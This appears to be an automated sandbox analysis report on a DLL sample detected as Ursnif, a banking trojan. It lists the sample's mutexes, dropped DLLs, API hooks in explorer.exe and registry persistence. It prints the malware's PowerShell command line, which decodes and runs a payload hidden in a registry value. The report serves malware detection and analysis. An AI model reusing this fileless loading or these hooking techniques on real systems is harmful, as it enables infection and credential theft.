Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD11B8 CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,CloseHandle, 0_2_00DD11B8
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,Bonebegin
Source: C:\Windows\System32\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{023FD26A-79F2-8479-1356-BDF8F7EA41AC}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5336:120:WilError_01
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{5E9A7C9C-253E-40D9-9F72-297443C66DE8}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2812:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1568:120:WilError_01
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{BA7B1CC8-D157-FCAE-2B8E-95F08FA29924}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{72D23258-290F-740E-43C6-6DE8275AF19C}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:612:120:WilError_01
Source: C:\Windows\SysWOW64\cmd.exe Mutant created: \Sessions\1\BaseNamedObjects\{82342662-F969-048B-93D6-3D78776AC12C}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{82DD54AC-F9FE-041C-93D6-3D78776AC12C}
Source: C:\Windows\System32\loaddll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{AEF8588D-35E8-10DC-2FC2-3944D3167DB8}
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\nslookup.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\nslookup.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\explorer.exe File opened: C:\Windows\SYSTEM32\msftedit.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: data.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: data.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: data.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: data.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: data.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: data.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: data.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: data.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: h.pdb> source: powershell.exe, 0000000F.00000003.961179690.0000029E611B1000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.pdb source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.pdbXP source: powershell.exe, 0000000F.00000002.1028629479.0000029E4CF68000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.889743890.0000000004B10000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.910516903.0000000005CA0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.889743890.0000000004B10000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.910516903.0000000005CA0000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.pdb source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.pdb source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.pdbXP source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.pdbXP source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.pdbXP source: powershell.exe, 00000011.00000002.994879898.0000026445852000.00000004.00000001.sdmp
Source: Binary string: c:\Baby\High\Ease\gener\side \Soon.pdb source: loaddll32.exe, 00000000.00000002.1185778870.000000006E4FF000.00000002.00020000.sdmp, data.dll
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.pdb source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
Source: data.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: data.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: data.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: data.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: data.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4B2263 push ecx; ret 0_2_6E4B2273
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4B2210 push ecx; ret 0_2_6E4B2219
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD7AB0 push ecx; ret 0_2_00DD7AB9
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD7E1F push ecx; ret 0_2_00DD7E2F
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04584EE0 push ecx; ret 0_2_04584EE9
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_045679B6 push ss; ret 0_2_045679B7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0458528F push ecx; ret 0_2_0458529F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BC4EE0 push ecx; ret 3_2_04BC4EE9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BA79B6 push ss; ret 3_2_04BA79B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BC528F push ecx; ret 3_2_04BC529F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04A77AB0 push ecx; ret 5_2_04A77AB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04A77E1F push ecx; ret 5_2_04A77E2F
Source: C:\Windows\System32\control.exe Code function: 34_2_0093B1B5 push 3B000001h; retf 34_2_0093B1BA
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67DB1B5 push 3B000001h; retf 45_2_000002D2D67DB1BA
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_009679B6 push ss; ret 49_2_009679B7
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0098528F push ecx; ret 49_2_0098529F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00984EE0 push ecx; ret 49_2_00984EE9
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4B1552 LoadLibraryA,GetProcAddress, 0_2_6E4B1552
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline'
PE file contains an invalid checksum
Source: aixojixg.dll.20.dr Static PE information: real checksum: 0x0 should be: 0xee27
Source: keehvxm3.dll.24.dr Static PE information: real checksum: 0x0 should be: 0xeb64
Source: data.dll Static PE information: real checksum: 0x75958 should be: 0x7619a
Source: a52acufz.dll.19.dr Static PE information: real checksum: 0x0 should be: 0x2fa8
Source: ddwuzigh.dll.23.dr Static PE information: real checksum: 0x0 should be: 0x5f5e

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822188626.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.825298638.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820080731.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072894975.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072798456.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820057009.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820031645.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883901477.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.917425679.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820138747.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000002.1074072106.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.834818320.00000000052DC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072599923.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072653572.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822158100.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.981565141.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883872155.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.828362336.00000000037CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072532170.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883811052.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822174917.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.884018260.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822140540.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072835287.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820149124.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.831790686.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883955178.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883841890.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072860777.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822201439.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.917192425.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820105585.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820124489.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072702315.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.917381680.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.976409970.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822118999.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883968959.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822095380.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883922056.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822210258.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.825513786.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.822798516.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.976255392.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820157511.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.979102398.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.976439736.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.969571267.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 1848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4868, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6508, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4268, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4772, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 1260, type: MEMORYSTR
Source: Yara match File source: 0.3.loaddll32.exe.3978d40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5488d40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5488d40.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.53da4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.53da4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.54594a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.38ca4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.39494a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.38ca4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000022.00000000.912908766.0000000000920000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000002.1184353403.000001B4FABB1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.973903195.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000000.1056728839.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.971901239.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.977715932.000002D2D67C1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.915124168.0000000000920000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.960999590.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.831743156.0000000005459000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.1186234366.0000027D4F801000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000002.1182359593.000001DA4C261000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000000.1013485765.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.985513376.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.825194509.00000000038CA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000000.1018879466.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.960496675.0000000006AD1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000000.1049623811.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.977139805.0000000000921000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.976843830.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.952939817.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.831611672.00000000053DA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.975140453.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000000.1024534203.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.911103239.0000000000920000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.970866897.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.950497075.000000000515F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.1028966230.0000029E58B09000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000000.1045657858.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.825244038.0000000003949000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1182006594.000000000364F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.3.loaddll32.exe.10d8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.5d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30a94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.4f694a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.db8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.49594a0.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.ef8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30a94a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.49594a0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5a8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.6e4b0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.rundll32.exe.d88cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.rundll32.exe.4a70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.4f694a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.928533475.0000000004959000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1181853805.00000000030A9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.797262385.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.776223175.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.798115453.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.833489958.0000000004F69000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.786707655.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFABB03521C
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFABB035200
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\explorer.exe Registry key monitored for changes: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
